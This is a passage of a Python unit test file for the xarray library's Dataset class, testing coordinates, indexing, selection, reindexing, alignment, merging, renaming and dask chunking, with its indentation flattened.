attributes = {'foo': 'bar'}
a['x'] = ('x', vec, attributes)
self.assertTrue('x' in a.coords)
self.assertIsInstance(a.coords['x'].to_index(),
pd.Index)
self.assertVariableIdentical(a.coords['x'], a.variables['x'])
b = Dataset()
b['x'] = ('x', vec, attributes)
self.assertVariableIdentical(a['x'], b['x'])
self.assertEqual(a.dims, b.dims)
# this should work
a['x'] = ('x', vec[:5])
a['z'] = ('x', np.arange(5))
with self.assertRaises(ValueError):
# now it shouldn't, since there is a conflicting length
a['x'] = ('x', vec[:4])
arr = np.random.random((10, 1,))
scal = np.array(0)
with self.assertRaises(ValueError):
a['y'] = ('y', arr)
with self.assertRaises(ValueError):
a['y'] = ('y', scal)
self.assertTrue('y' not in a.dims)
def test_coords_properties(self):
# use an OrderedDict for coordinates to ensure order across python
# versions
# use int64 for repr consistency on windows
data = Dataset(OrderedDict([('x', ('x', np.array([-1, -2], 'int64'))),
('y', ('y', np.array([0, 1, 2], 'int64'))),
('foo', (['x', 'y'],
np.random.randn(2, 3)))]),
OrderedDict([('a', ('x', np.array([4, 5], 'int64'))),
('b', np.int64(-10))]))
self.assertEqual(4, len(data.coords))
self.assertItemsEqual(['x', 'y', 'a', 'b'], list(data.coords))
self.assertVariableIdentical(data.coords['x'], data['x'].variable)
self.assertVariableIdentical(data.coords['y'], data['y'].variable)
self.assertIn('x', data.coords)
self.assertIn('a', data.coords)
self.assertNotIn(0, data.coords)
self.assertNotIn('foo', data.coords)
with self.assertRaises(KeyError):
data.coords['foo']
with self.assertRaises(KeyError):
data.coords[0]
expected = dedent("""\
Coordinates:
* x (x) int64 -1 -2
* y (y) int64 0 1 2
a (x) int64 4 5
b int64 -10""")
actual = repr(data.coords)
self.assertEqual(expected, actual)
self.assertEqual({'x': 2, 'y': 3}, data.coords.dims)
def test_coords_modify(self):
data = Dataset({'x': ('x', [-1, -2]),
'y': ('y', [0, 1, 2]),
'foo': (['x', 'y'], np.random.randn(2, 3))},
{'a': ('x', [4, 5]), 'b': -10})
actual = data.copy(deep=True)
actual.coords['x'] = ('x', ['a', 'b'])
self.assertArrayEqual(actual['x'], ['a', 'b'])
actual = data.copy(deep=True)
actual.coords['z'] = ('z', ['a', 'b'])
self.assertArrayEqual(actual['z'], ['a', 'b'])
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
data.coords['x'] = ('x', [-1])
actual = data.copy()
del actual.coords['b']
expected = data.reset_coords('b', drop=True)
self.assertDatasetIdentical(expected, actual)
with self.assertRaises(KeyError):
del data.coords['not_found']
with self.assertRaises(KeyError):
del data.coords['foo']
actual = data.copy(deep=True)
actual.coords.update({'c': 11})
expected = data.merge({'c': 11}).set_coords('c')
self.assertDatasetIdentical(expected, actual)
def test_coords_set(self):
one_coord = Dataset({'x': ('x', [0]),
'yy': ('x', [1]),
'zzz': ('x', [2])})
two_coords = Dataset({'zzz': ('x', [2])},
{'x': ('x', [0]),
'yy': ('x', [1])})
all_coords = Dataset(coords={'x': ('x', [0]),
'yy': ('x', [1]),
'zzz': ('x', [2])})
actual = one_coord.set_coords('x')
self.assertDatasetIdentical(one_coord, actual)
actual = one_coord.set_coords(['x'])
self.assertDatasetIdentical(one_coord, actual)
actual = one_coord.set_coords('yy')
self.assertDatasetIdentical(two_coords, actual)
actual = one_coord.set_coords(['yy', 'zzz'])
self.assertDatasetIdentical(all_coords, actual)
actual = one_coord.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = two_coords.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords()
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords(['yy', 'zzz'])
self.assertDatasetIdentical(one_coord, actual)
actual = all_coords.reset_coords('zzz')
self.assertDatasetIdentical(two_coords, actual)
with self.assertRaisesRegexp(ValueError, 'cannot remove index'):
one_coord.reset_coords('x')
actual = all_coords.reset_coords('zzz', drop=True)
expected = all_coords.drop('zzz')
self.assertDatasetIdentical(expected, actual)
expected = two_coords.drop('zzz')
self.assertDatasetIdentical(expected, actual)
def test_coords_to_dataset(self):
orig = Dataset({'foo': ('y', [-1, 0, 1])}, {'x': 10, 'y': [2, 3, 4]})
expected = Dataset(coords={'x': 10, 'y': [2, 3, 4]})
actual = orig.coords.to_dataset()
self.assertDatasetIdentical(expected, actual)
def test_coords_merge(self):
orig_coords = Dataset(coords={'a': ('x', [1, 2])}).coords
other_coords = Dataset(coords={'b': ('x', ['a', 'b'])}).coords
expected = Dataset(coords={'a': ('x', [1, 2]),
'b': ('x', ['a', 'b'])})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'x': ('x', ['a'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'x': ('x', ['a', 'b'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'x': ('x', ['a', 'b', 'c'])}).coords
with self.assertRaisesRegexp(ValueError, 'not aligned'):
orig_coords.merge(other_coords)
other_coords = Dataset(coords={'a': ('x', [8, 9])}).coords
expected = Dataset(coords={'x': range(2)})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'x': np.nan}).coords
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(orig_coords.to_dataset(), actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(orig_coords.to_dataset(), actual)
def test_coords_merge_mismatched_shape(self):
orig_coords = Dataset(coords={'a': ('x', [1, 1])}).coords
other_coords = Dataset(coords={'a': 1}).coords
expected = orig_coords.to_dataset()
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
other_coords = Dataset(coords={'a': ('y', [1])}).coords
expected = Dataset(coords={'a': (['x', 'y'], [[1], [1]])})
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
actual = other_coords.merge(orig_coords)
self.assertDatasetIdentical(expected.T, actual)
orig_coords = Dataset(coords={'a': ('x', [np.nan])}).coords
other_coords = Dataset(coords={'a': np.nan}).coords
expected = orig_coords.to_dataset()
actual = orig_coords.merge(other_coords)
self.assertDatasetIdentical(expected, actual)
def test_equals_and_identical(self):
data = create_test_data(seed=42)
self.assertTrue(data.equals(data))
self.assertTrue(data.identical(data))
data2 = create_test_data(seed=42)
data2.attrs['foobar'] = 'baz'
self.assertTrue(data.equals(data2))
self.assertFalse(data.identical(data2))
del data2['time']
self.assertFalse(data.equals(data2))
data = create_test_data(seed=42).rename({'var1': None})
self.assertTrue(data.equals(data))
self.assertTrue(data.identical(data))
data2 = data.reset_coords()
self.assertFalse(data2.equals(data))
self.assertFalse(data2.identical(data))
def test_equals_failures(self):
data = create_test_data()
self.assertFalse(data.equals('foo'))
self.assertFalse(data.identical(123))
self.assertFalse(data.broadcast_equals({1: 2}))
def test_broadcast_equals(self):
data1 = Dataset(coords={'x': 0})
data2 = Dataset(coords={'x': [0]})
self.assertTrue(data1.broadcast_equals(data2))
self.assertFalse(data1.equals(data2))
self.assertFalse(data1.identical(data2))
def test_attrs(self):
data = create_test_data(seed=42)
data.attrs = {'foobar': 'baz'}
self.assertTrue(data.attrs['foobar'], 'baz')
self.assertIsInstance(data.attrs, OrderedDict)
@requires_dask
def test_chunk(self):
data = create_test_data()
for v in data.variables.values():
self.assertIsInstance(v.data, np.ndarray)
self.assertEqual(data.chunks, {})
reblocked = data.chunk()
for v in reblocked.variables.values():
self.assertIsInstance(v.data, da.Array)
expected_chunks = dict((d, (s,)) for d, s in data.dims.items())
self.assertEqual(reblocked.chunks, expected_chunks)
reblocked = data.chunk({'time': 5, 'dim1': 5, 'dim2': 5, 'dim3': 5})
expected_chunks = {'time': (5,) * 4, 'dim1': (5, 3),
'dim2': (5, 4), 'dim3': (5, 5)}
self.assertEqual(reblocked.chunks, expected_chunks)
reblocked = data.chunk(expected_chunks)
self.assertEqual(reblocked.chunks, expected_chunks)
# reblock on already blocked data
reblocked = reblocked.chunk(expected_chunks)
self.assertEqual(reblocked.chunks, expected_chunks)
self.assertDatasetIdentical(reblocked, data)
with self.assertRaisesRegexp(ValueError, 'some chunks'):
data.chunk({'foo': 10})
@requires_dask
def test_dask_is_lazy(self):
store = InaccessibleVariableDataStore()
create_test_data().dump_to_store(store)
ds = open_dataset(store).chunk()
with self.assertRaises(UnexpectedDataAccess):
ds.load()
with self.assertRaises(UnexpectedDataAccess):
ds['var1'].values
# these should not raise UnexpectedDataAccess:
ds.var1.data
ds.isel(time=10)
ds.isel(time=slice(10), dim1=[0]).isel(dim1=0, dim2=-1)
ds.transpose()
ds.mean()
ds.fillna(0)
ds.rename({'dim1': 'foobar'})
ds.set_coords('var1')
ds.drop('var1')
def test_isel(self):
data = create_test_data()
slicers = {'dim1': slice(None, None, 2), 'dim2': slice(0, 2)}
ret = data.isel(**slicers)
# Verify that only the specified dimension was altered
self.assertItemsEqual(data.dims, ret.dims)
for d in data.dims:
if d in slicers:
self.assertEqual(ret.dims[d],
np.arange(data.dims[d])[slicers[d]].size)
else:
self.assertEqual(data.dims[d], ret.dims[d])
# Verify that the data is what we expect
for v in data:
self.assertEqual(data[v].dims, ret[v].dims)
self.assertEqual(data[v].attrs, ret[v].attrs)
slice_list = [slice(None)] * data[v].values.ndim
for d, s in iteritems(slicers):
if d in data[v].dims:
inds = np.nonzero(np.array(data[v].dims) == d)[0]
for ind in inds:
slice_list[ind] = s
expected = data[v].values[slice_list]
actual = ret[v].values
np.testing.assert_array_equal(expected, actual)
with self.assertRaises(ValueError):
data.isel(not_a_dim=slice(0, 2))
ret = data.isel(dim1=0)
self.assertEqual({'time': 20, 'dim2': 9, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes, list(ret.indexes) + ['dim1'])
ret = data.isel(time=slice(2), dim1=0, dim2=slice(5))
self.assertEqual({'time': 2, 'dim2': 5, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes, list(ret.indexes) + ['dim1'])
ret = data.isel(time=0, dim1=0, dim2=slice(5))
self.assertItemsEqual({'dim2': 5, 'dim3': 10}, ret.dims)
self.assertItemsEqual(data.data_vars, ret.data_vars)
self.assertItemsEqual(data.coords, ret.coords)
self.assertItemsEqual(data.indexes,
list(ret.indexes) + ['dim1', 'time'])
def test_sel(self):
data = create_test_data()
int_slicers = {'dim1': slice(None, None, 2),
'dim2': slice(2),
'dim3': slice(3)}
loc_slicers = {'dim1': slice(None, None, 2),
'dim2': slice(0, 0.5),
'dim3': slice('a', 'c')}
self.assertDatasetEqual(data.isel(**int_slicers),
data.sel(**loc_slicers))
data['time'] = ('time', pd.date_range('2000-01-01', periods=20))
self.assertDatasetEqual(data.isel(time=0),
data.sel(time='2000-01-01'))
self.assertDatasetEqual(data.isel(time=slice(10)),
data.sel(time=slice('2000-01-01',
'2000-01-10')))
self.assertDatasetEqual(data, data.sel(time=slice('1999', '2005')))
times = pd.date_range('2000-01-01', periods=3)
self.assertDatasetEqual(data.isel(time=slice(3)),
data.sel(time=times))
self.assertDatasetEqual(data.isel(time=slice(3)),
data.sel(time=(data['time.dayofyear'] <= 3)))
td = pd.to_timedelta(np.arange(3), unit='days')
data = Dataset({'x': ('td', np.arange(3)), 'td': td})
self.assertDatasetEqual(data, data.sel(td=td))
self.assertDatasetEqual(data, data.sel(td=slice('3 days')))
self.assertDatasetEqual(data.isel(td=0), data.sel(td='0 days'))
self.assertDatasetEqual(data.isel(td=0), data.sel(td='0h'))
self.assertDatasetEqual(data.isel(td=slice(1, 3)),
data.sel(td=slice('1 days', '2 days')))
def test_isel_points(self):
data = create_test_data()
pdim1 = [1, 2, 3]
pdim2 = [4, 5, 1]
pdim3 = [1, 2, 3]
actual = data.isel_points(dim1=pdim1, dim2=pdim2, dim3=pdim3,
dim='test_coord')
assert 'test_coord' in actual.coords
assert actual.coords['test_coord'].shape == (len(pdim1), )
actual = data.isel_points(dim1=pdim1, dim2=pdim2)
assert 'points' in actual.coords
np.testing.assert_array_equal(pdim1, actual['dim1'])
# test that the order of the indexers doesn't matter
self.assertDatasetIdentical(data.isel_points(dim1=pdim1, dim2=pdim2),
data.isel_points(dim2=pdim2, dim1=pdim1))
# make sure we're raising errors in the right places
with self.assertRaisesRegexp(ValueError,
'All indexers must be the same length'):
data.isel_points(dim1=[1, 2], dim2=[1, 2, 3])
with self.assertRaisesRegexp(ValueError,
'dimension bad_key does not exist'):
data.isel_points(bad_key=[1, 2])
with self.assertRaisesRegexp(TypeError, 'Indexers must be integers'):
data.isel_points(dim1=[1.5, 2.2])
with self.assertRaisesRegexp(TypeError, 'Indexers must be integers'):
data.isel_points(dim1=[1, 2, 3], dim2=slice(3))
with self.assertRaisesRegexp(ValueError,
'Indexers must be 1 dimensional'):
data.isel_points(dim1=1, dim2=2)
with self.assertRaisesRegexp(ValueError,
'Existing dimension names are not valid'):
data.isel_points(dim1=[1, 2], dim2=[1, 2], dim='dim2')
# test to be sure we keep around variables that were not indexed
ds = Dataset({'x': [1, 2, 3, 4], 'y': 0})
actual = ds.isel_points(x=[0, 1, 2])
self.assertDataArrayIdentical(ds['y'], actual['y'])
# tests using index or DataArray as a dim
stations = Dataset()
stations['station'] = ('station', ['A', 'B', 'C'])
stations['dim1s'] = ('station', [1, 2, 3])
stations['dim2s'] = ('station', [4, 5, 1])
actual = data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=stations['station'])
assert 'station' in actual.coords
assert 'station' in actual.dims
self.assertDataArrayIdentical(actual['station'].drop(['dim1', 'dim2']),
stations['station'])
# make sure we get the default points coordinate when a list is passed
actual = data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=['A', 'B', 'C'])
assert 'points' in actual.coords
# can pass a numpy array
data.isel_points(dim1=stations['dim1s'],
dim2=stations['dim2s'],
dim=np.array([4, 5, 6]))
def test_sel_points(self):
data = create_test_data()
pdim1 = [1, 2, 3]
pdim2 = [4, 5, 1]
pdim3 = [1, 2, 3]
expected = data.isel_points(dim1=pdim1, dim2=pdim2, dim3=pdim3,
dim='test_coord')
actual = data.sel_points(dim1=data.dim1[pdim1], dim2=data.dim2[pdim2],
dim3=data.dim3[pdim3], dim='test_coord')
self.assertDatasetIdentical(expected, actual)
data = Dataset({'foo': (('x', 'y'), np.arange(9).reshape(3, 3))})
expected = Dataset({'foo': ('points', [0, 4, 8])},
{'x': ('points', range(3)),
'y': ('points', range(3))})
actual = data.sel_points(x=[0.1, 1.1, 2.5], y=[0, 1.2, 2.0],
method='pad')
self.assertDatasetIdentical(expected, actual)
def test_sel_method(self):
data = create_test_data()
if pd.__version__ >= '0.16':
expected = data.sel(dim1=1)
actual = data.sel(dim1=0.95, method='nearest')
self.assertDatasetIdentical(expected, actual)
expected = data.sel(dim2=[1.5])
actual = data.sel(dim2=[1.45], method='backfill')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(NotImplementedError, 'slice objects'):
data.sel(dim2=slice(1, 3), method='ffill')
def test_loc(self):
data = create_test_data()
expected = data.sel(dim3='a')
actual = data.loc[dict(dim3='a')]
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(TypeError, 'can only lookup dict'):
data.loc['a']
with self.assertRaises(TypeError):
data.loc[dict(dim3='a')] = 0
def test_reindex_like(self):
data = create_test_data()
data['letters'] = ('dim3', 10 * ['a'])
expected = data.isel(dim1=slice(10), time=slice(13))
actual = data.reindex_like(expected)
self.assertDatasetIdentical(actual, expected)
expected = data.copy(deep=True)
expected['dim3'] = ('dim3', list('cdefghijkl'))
expected['var3'][:-2] = expected['var3'][2:]
expected['var3'][-2:] = np.nan
expected['letters'] = expected['letters'].astype(object)
expected['letters'][-2:] = np.nan
expected['numbers'] = expected['numbers'].astype(float)
expected['numbers'][:-2] = expected['numbers'][2:].values
expected['numbers'][-2:] = np.nan
actual = data.reindex_like(expected)
self.assertDatasetIdentical(actual, expected)
def test_reindex(self):
data = create_test_data()
self.assertDatasetIdentical(data, data.reindex())
expected = data.isel(dim1=slice(10))
actual = data.reindex(dim1=data['dim1'][:10])
self.assertDatasetIdentical(actual, expected)
actual = data.reindex(dim1=data['dim1'][:10].values)
self.assertDatasetIdentical(actual, expected)
actual = data.reindex(dim1=data['dim1'][:10].to_index())
self.assertDatasetIdentical(actual, expected)
# test dict-like argument
actual = data.reindex({'dim1': data['dim1'][:10]})
self.assertDatasetIdentical(actual, expected)
with self.assertRaisesRegexp(ValueError, 'cannot specify both'):
data.reindex({'x': 0}, x=0)
with self.assertRaisesRegexp(ValueError, 'dictionary'):
data.reindex('foo')
# out of order
expected = data.sel(dim1=data['dim1'][:10:-1])
actual = data.reindex(dim1=data['dim1'][:10:-1])
self.assertDatasetIdentical(actual, expected)
# regression test for #279
expected = Dataset({'x': ('time', np.random.randn(5))})
time2 = DataArray(np.arange(5), dims="time2")
actual = expected.reindex(time=time2)
self.assertDatasetIdentical(actual, expected)
# another regression test
ds = Dataset({'foo': (['x', 'y'], np.zeros((3, 4)))})
expected = Dataset({'foo': (['x', 'y'], np.zeros((3, 2))),
'x': [0, 1, 3]})
expected['foo'][-1] = np.nan
actual = ds.reindex(x=[0, 1, 3], y=[0, 1])
self.assertDatasetIdentical(expected, actual)
def test_reindex_method(self):
ds = Dataset({'x': ('y', [10, 20])})
y = [-0.5, 0.5, 1.5]
actual = ds.reindex(y=y, method='backfill')
expected = Dataset({'x': ('y', [10, 20, np.nan]), 'y': y})
self.assertDatasetIdentical(expected, actual)
actual = ds.reindex(y=y, method='pad')
expected = Dataset({'x': ('y', [np.nan, 10, 20]), 'y': y})
self.assertDatasetIdentical(expected, actual)
alt = Dataset({'y': y})
actual = ds.reindex_like(alt, method='pad')
self.assertDatasetIdentical(expected, actual)
def test_align(self):
left = create_test_data()
right = left.copy(deep=True)
right['dim3'] = ('dim3', list('cdefghijkl'))
right['var3'][:-2] = right['var3'][2:]
right['var3'][-2:] = np.random.randn(*right['var3'][-2:].shape)
right['numbers'][:-2] = right['numbers'][2:]
right['numbers'][-2:] = -10
intersection = list('cdefghij')
union = list('abcdefghijkl')
left2, right2 = align(left, right, join='inner')
self.assertArrayEqual(left2['dim3'], intersection)
self.assertDatasetIdentical(left2, right2)
left2, right2 = align(left, right, join='outer')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertArrayEqual(left2['dim3'], union)
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(left2['var3'][-2:]).all())
self.assertTrue(np.isnan(right2['var3'][:2]).all())
left2, right2 = align(left, right, join='left')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertVariableEqual(left2['dim3'], left['dim3'])
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(right2['var3'][:2]).all())
left2, right2 = align(left, right, join='right')
self.assertVariableEqual(left2['dim3'], right2['dim3'])
self.assertVariableEqual(left2['dim3'], right['dim3'])
self.assertDatasetIdentical(left2.sel(dim3=intersection),
right2.sel(dim3=intersection))
self.assertTrue(np.isnan(left2['var3'][-2:]).all())
with self.assertRaisesRegexp(ValueError, 'invalid value for join'):
align(left, right, join='foobar')
with self.assertRaises(TypeError):
align(left, right, foo='bar')
def test_variable_indexing(self):
data = create_test_data()
v = data['var1']
d1 = data['dim1']
d2 = data['dim2']
self.assertVariableEqual(v, v[d1.values])
self.assertVariableEqual(v, v[d1])
self.assertVariableEqual(v[:3], v[d1 < 3])
self.assertVariableEqual(v[:, 3:], v[:, d2 >= 1.5])
self.assertVariableEqual(v[:3, 3:], v[d1 < 3, d2 >= 1.5])
self.assertVariableEqual(v[:3, :2], v[range(3), range(2)])
self.assertVariableEqual(v[:3, :2], v.loc[d1[:3], d2[:2]])
def test_drop_variables(self):
data = create_test_data()
self.assertDatasetIdentical(data, data.drop([]))
expected = Dataset(dict((k, data[k]) for k in data if k != 'time'))
actual = data.drop('time')
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['time'])
self.assertDatasetIdentical(expected, actual)
expected = Dataset(dict((k, data[k]) for
k in ['dim2', 'dim3', 'time', 'numbers']))
actual = data.drop('dim1')
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'cannot be found'):
data.drop('not_found_here')
def test_drop_index_labels(self):
data = Dataset({'A': (['x', 'y'], np.random.randn(2, 3)),
'x': ['a', 'b']})
actual = data.drop(1, 'y')
expected = data.isel(y=[0, 2])
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['a'], 'x')
expected = data.isel(x=[1])
self.assertDatasetIdentical(expected, actual)
actual = data.drop(['a', 'b'], 'x')
expected = data.isel(x=slice(0, 0))
self.assertDatasetIdentical(expected, actual)
with self.assertRaises(ValueError):
# not contained in axis
data.drop(['c'], dim='x')
def test_copy(self):
data = create_test_data()
for copied in [data.copy(deep=False), copy(data)]:
self.assertDatasetIdentical(data, copied)
for k in data:
v0 = data.variables[k]
v1 = copied.variables[k]
self.assertIs(v0, v1)
copied['foo'] = ('z', np.arange(5))
self.assertNotIn('foo', data)
for copied in [data.copy(deep=True), deepcopy(data)]:
self.assertDatasetIdentical(data, copied)
for k in data:
v0 = data.variables[k]
v1 = copied.variables[k]
self.assertIsNot(v0, v1)
def test_rename(self):
data = create_test_data()
newnames = {'var1': 'renamed_var1', 'dim2': 'renamed_dim2'}
renamed = data.rename(newnames)
variables = OrderedDict(data.variables)
for k, v in iteritems(newnames):
variables[v] = variables.pop(k)
for k, v in iteritems(variables):
dims = list(v.dims)
for name, newname in iteritems(newnames):
if name in dims:
dims[dims.index(name)] = newname
self.assertVariableEqual(Variable(dims, v.values, v.attrs),
renamed[k])
self.assertEqual(v.encoding, renamed[k].encoding)
self.assertEqual(type(v), type(renamed.variables[k]))
self.assertTrue('var1' not in renamed)
self.assertTrue('dim2' not in renamed)
with self.assertRaisesRegexp(ValueError, "cannot rename 'not_a_var'"):
data.rename({'not_a_var': 'nada'})
# verify that we can rename a variable without accessing the data
var1 = data['var1']
data['var1'] = (var1.dims, InaccessibleArray(var1.values))
renamed = data.rename(newnames)
with self.assertRaises(UnexpectedDataAccess):
renamed['renamed_var1'].values
def test_rename_inplace(self):
times = pd.date_range('2000-01-01', periods=3)
data = Dataset({'z': ('x', [2, 3, 4]), 't': ('t', times)})
copied = data.copy()
renamed = data.rename({'x': 'y'})
data.rename({'x': 'y'}, inplace=True)
self.assertDatasetIdentical(data, renamed)
self.assertFalse(data.equals(copied))
self.assertEquals(data.dims, {'y': 3, 't': 3})
# check virtual variables
self.assertArrayEqual(data['t.dayofyear'], [1, 2, 3])
def test_swap_dims(self):
original = Dataset({'x': [1, 2, 3], 'y': ('x', list('abc')), 'z': 42})
expected = Dataset({'z': 42}, {'x': ('y', [1, 2, 3]), 'y': list('abc')})
actual = original.swap_dims({'x': 'y'})
self.assertDatasetIdentical(expected, actual)
self.assertIsInstance(actual.variables['y'], Coordinate)
self.assertIsInstance(actual.variables['x'], Variable)
roundtripped = actual.swap_dims({'y': 'x'})
self.assertDatasetIdentical(original.set_coords('y'), roundtripped)
actual = original.copy()
actual.swap_dims({'x': 'y'}, inplace=True)
self.assertDatasetIdentical(expected, actual)
with self.assertRaisesRegexp(ValueError, 'cannot swap'):
original.swap_dims({'y': 'x'})
with self.assertRaisesRegexp(ValueError, 'replacement dimension'):
original.swap_dims({'x': 'z'})
def test_update(self):
data = create_test_data(seed=0)
expected = data.copy()
var2 = Variable('dim1', np.arange(8))
actual = data.update({'var2': var2})
expected['var2'] = var2
self.assertDatasetIdentical(expected, actual)
actual = data.copy()
actual_result = actual.update(data, inplace=True)
self.assertIs(actual_result, actual)
self.assertDatasetIdentical(expected, actual)
actual = data.update(data, inplace=False)
expected = data
self.assertIsNot(actual, expected)
self.assertDatasetIdentical(expected, actual)
other = Dataset(attrs={'new': 'attr'})
actual = data.copy()
actual.update(other)
self.assertDatasetIdentical(expected, actual)
def test_update_auto_align(self):
ds = Dataset({'x': ('t', [3, 4])})
expected = Dataset({'x': ('t', [3, 4]), 'y': ('t', [np.nan, 5])})
actual = ds.copy()
other = {'y': ('t', [5]), 't': [1]}
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
actual.update(other)
actual.update(Dataset(other))
self.assertDatasetIdentical(expected, actual)
actual = ds.copy()
other = Dataset({'y': ('t', [5]), 't': [100]})
actual.update(other)
expected = Dataset({'x': ('t', [3, 4]), 'y': ('t', [np.nan] * 2)})
self.assertDatasetIdentical(expected, actual)
def test_merge(self):
data = create_test_data()
ds1 = data[['var1']]
ds2 = data[['var3']]
expected = data[['var1', 'var3']]
actual = ds1.merge(ds2)
self.assertDatasetIdentical(expected, actual)
actual = ds2.merge(ds1)
self.assertDatasetIdentical(expected, actual)
actual = data.merge(data)
self.assertDatasetIdentical(data, actual)
actual = data.reset_coords(drop=True).merge(data)
self.assertDatasetIdentical(data, actual)
actual = data.merge(data.reset_coords(drop=True))
self.assertDatasetIdentical(data, actual)
with self.assertRaises(ValueError):
ds1.merge(ds2.rename({'var3': 'var1'}))
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data.reset_coords().merge(data)
with self.assertRaisesRegexp(ValueError, 'cannot merge'):
data.merge(data.reset_coords())
def test_merge_broadcast_equals(self):
ds1 = Dataset({'x': 0})
ds2 = Dataset({'x': ('y', [0, 0])})
actual = ds1.merge(ds2)
self.assertDatasetIdentical(ds2, actual)
actual = ds2.merge(ds1)
self.assertDatasetIdentical(ds2, actual)
actual = ds1.copy()
actual.update(ds2)
self.assertDatasetIdentical(ds2, actual)
ds1 = Dataset({'x': np.nan})
ds2 = Dataset({'x': ('y', [np.nan, np.nan])})
actual = ds1.merge(ds2)
self.assertDatasetIdentical(ds2, actual)
def test_merge_compat(self):
ds1 = Dataset({'x': 0})
ds2 = Dataset({'x': 1})
for compat in ['broadcast_equals', 'equals', 'identical']:
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat=compat)
ds2 = Dataset({'x': [0, 0]})
for compat in ['equals', 'identical']:
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat=compat)
ds2 = Dataset({'x': ((), 0, {'foo': 'bar'})})
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
ds1.merge(ds2, compat='identical')
with self.assertRaisesRegexp(ValueError, 'compat=\S+ invalid'):
ds1.merge(ds2, compat='foobar')
def test_merge_auto_align(self):
ds1 = Dataset({'a': ('x', [1, 2])})
ds2 = Dataset({'b': ('x', [3, 4]), 'x': [1, 2]})
expected = Dataset({'a': ('x', [1, 2, np.nan]),
'b': ('x', [np.nan, 3, 4])})
self.assertDatasetIdentical(expected, ds1.merge(ds2))
self.assertDatasetIdentical(expected, ds2.merge(ds1))
expected = expected.isel(x=slice(2))
self.assertDatasetIdentical(expected, ds1.merge(ds2, join='left'))
self.assertDatasetIdentical(expected, ds2.merge(ds1, join='right'))
expected = expected.isel(x=slice(1, 2))
self.assertDatasetIdentical(expected, ds1.merge(ds2, join='inner'))
self.assertDatasetIdentical(expected, ds2.merge(ds1, join='inner'))
def test_getitem(self):
data = create_test_data()
self.assertIsInstance(data['var1'], DataArray)
self.assertVariableEqual(data['var1'], data.variables['var1'])
with self.assertRaises(KeyError):
data['notfound']
with self.assertRaises(KeyError):
data[['var1', 'notfound']]
actual = data[['var1', 'var2']]
expected = Dataset({'var1': data['var1'], 'var2': data['var2']})
self.assertDatasetEqual(expected, actual)
actual = data['numbers']
expected = DataArray(data['numbers'].variable, [data['dim3']],
name='numbers')
self.assertDataArrayIdentical(expected, actual)
actual = data[dict(dim1=0)]
expected = data.isel(dim1=0)
self.assertDatasetIdentical(expected, actual)
def test_getitem_hashable(self):
data = create_test_data()
data[(3, 4)] = data['var1'] + 1
expected = data['var1'] + 1
expected.name = (3, 4)
self.assertDataArrayIdentical(expected, data[(3, 4)])
with self.assertRaisesRegexp(KeyError, "('var1', 'var2')"):
data[('var1', 'var2')]
def test_virtual_variables(self):
# access virtual variables
data = create_test_data()
expected = DataArray(1 + np.arange(20), coords=[data['time']],
dims='time', name='dayofyear')
self.assertDataArrayIdentical(expected, data['time.dayofyear'])
self.assertArrayEqual(data['time.month'].values,
data.variables['time'].to_index().month)
self.assertArrayEqual(data['time.season'].values, 'DJF')
# test virtual variable math
self.assertArrayEqual(data['time.dayofyear'] + 1, 2 + np.arange(20))
self.assertArrayEqual(np.sin(data['time.dayofyear']),
np.sin(1 + np.arange(20)))
# ensure they become coordinates
expected = Dataset({}, {'dayofyear': data['time.dayofyear']})
actual = data[['time.dayofyear']]
self.assertDatasetEqual(expected, actual)
# non-coordinate variables
ds = Dataset({'t': ('x', pd.date_range('2000-01-01', periods=3))})
self.assertTrue((ds['t.year'] == 2000).all())
def test_time_season(self):
ds = Dataset({'t': pd.date_range('2000-01-01', periods=12, freq='M')})
expected = ['DJF'] * 2 + ['MAM'] * 3 + ['JJA'] * 3 + ['SON'] * 3 + ['DJF']
self.assertArrayEqual(expected, ds['t.season'])
def test_slice_virtual_variable(self):
data = create_test_data()
self.assertVariableEqual(data['time.dayofyear'][:10],
Variable(['time'], 1 + np.arange(10)))
self.assertVariableEqual(data['time.dayofyear'][0], Variable([], 1))
def test_setitem(self):
# assign a variable
var = Variable(['dim1'], np.random.randn(8))
